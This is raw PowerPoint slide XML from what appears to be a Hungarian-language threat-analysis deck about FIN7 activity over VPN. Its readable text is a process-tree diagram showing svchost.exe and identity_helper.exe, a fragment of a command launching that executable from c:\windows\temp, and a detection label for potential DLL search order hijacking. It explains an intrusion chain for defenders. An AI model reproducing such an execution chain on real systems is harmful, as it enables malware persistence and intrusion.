                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93C4F65-B344-C831-BF03-9563079132D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="71" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="-12989395" y="-6374863"/>
                <a:ext cx="610296" cy="581574"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="31750">
                <a:solidFill>
                  <a:srgbClr val="424D56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390D721A-D3F5-E2C7-B41A-1DE2E8F1AC4D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-10635183" y="-3577504"/>
                <a:ext cx="3932165" cy="834390"/>
                <a:chOff x="12600384" y="914400"/>
                <a:chExt cx="3932165" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="75" name="Rounded Rectangle 74">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3B7B297-5437-27FA-A95F-BCC5DD4A656C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600384" y="1103018"/>
                  <a:ext cx="3630654" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="424D56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SK"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="77" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90708B96-4ADE-5CE5-2C4D-AA5789492B5F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12705306" y="914400"/>
                  <a:ext cx="3827243" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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defTabSz="1811382">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>identity_helper.exe</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> (1908)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="78" name="Elbow Connector 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25234D93-2313-4F61-6CEC-D93807467E0D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="75" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="-11069466" y="-3589079"/>
                <a:ext cx="567054" cy="301512"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="31750">
                <a:solidFill>
                  <a:srgbClr val="424D56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95E518A4-C0F0-B6B5-0BF6-08E5E8D667D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-11698978" y="-5284770"/>
                <a:ext cx="3510360" cy="834390"/>
                <a:chOff x="10629374" y="471448"/>
                <a:chExt cx="3510360" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="81" name="Group 80">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B267D3-BEA0-0654-A48A-9A7364ADFE3C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="10629374" y="471448"/>
                  <a:ext cx="3510360" cy="834390"/>
                  <a:chOff x="12235545" y="914400"/>
                  <a:chExt cx="3510360" cy="834390"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="83" name="Rounded Rectangle 82">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF9F3FF-7358-27AE-3D48-D6CAE5060514}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="12235545" y="1103018"/>
                    <a:ext cx="2983321" cy="468180"/>
                  </a:xfrm>
                  <a:prstGeom prst="roundRect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:srgbClr val="000D13"/>
                  </a:solidFill>
                  <a:ln>
                    <a:solidFill>
                      <a:srgbClr val="424D56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SK"/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="84" name="Rectangle: Rounded Corners 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F183942-BCBD-18F9-1C18-6379E19BDAFD}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="12677845" y="914400"/>
                    <a:ext cx="3068060" cy="834390"/>
                  </a:xfrm>
                  <a:prstGeom prst="roundRect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="1079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defTabSz="1811382">
                      <a:defRPr/>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/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rPr>
                      <a:t>svchost.exe</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1800" kern="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/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rPr>
                      <a:t> (1628)</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="82" name="Graphic 81">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE8C842-E580-9F19-F2A1-3E7169556E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96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                      <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId21"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
                <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10770007" y="743785"/>
                  <a:ext cx="295718" cy="284766"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="88" name="Elbow Connector 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D45864E-ED3C-3099-EA25-74CF8521016E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="83" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="-12298177" y="-5461262"/>
                <a:ext cx="647523" cy="550875"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="31750">
                <a:solidFill>
                  <a:srgbClr val="424D56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01" name="Graphic 100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{524A0278-6A07-2ECA-6BF4-DEECCAD52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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10936695" y="-2602938"/>
              <a:ext cx="300198" cy="300198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA21F87-CBA3-9D12-09FA-8CDD636C81A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10493170" y="-2657250"/>
              <a:ext cx="4477150" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Potential DLL search order hijacking </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>– untrusted system libs [F0450a]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D7EDBC-5429-B0ED-FF6C-4623C90859B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-8188617" y="-4398257"/>
              <a:ext cx="3785668" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" kern="0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/c c:\windows\temp\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" kern="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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identity_helper.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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02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45" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="5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454244" y="85313"/>
            <a:ext cx="780416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20"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="950" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="950" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8DC53E"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PARTNERS</a:t>
            </a:r>
            <a:endParaRPr sz="95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 flipH="1">
            <a:off x="762000" y="441961"/>
            <a:ext cx="8704118" cy="752130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13336" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15876">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="106"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Mivel foglalkoznak </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>valójában?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92649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B0DE7-B4F5-A4AD-074E-DA321A5C2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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FCF2A9-1CFA-818E-A597-F4C570AAAFD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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2743A0-1F74-6466-38DF-CD87C26088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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC1C81F-E38C-A636-4ACD-7209D48D6B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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A60867F-22D5-29A0-B5FC-C3546F4D754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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E0309F-AB0C-2309-6720-93EAD6ECE3D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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CACD25-EAAD-8E6A-6A01-E58B98C255FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914401" y="892285"/>
            <a:ext cx="3035004" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN – FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754" b="1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B959166-2BA5-A0EF-8D2C-7B24443008E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4200860" y="735035"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172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3F1380E-C657-6E54-8B13-AE00E9C73F9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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7953BCB-E7B5-6481-3A1E-A6018B0818FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
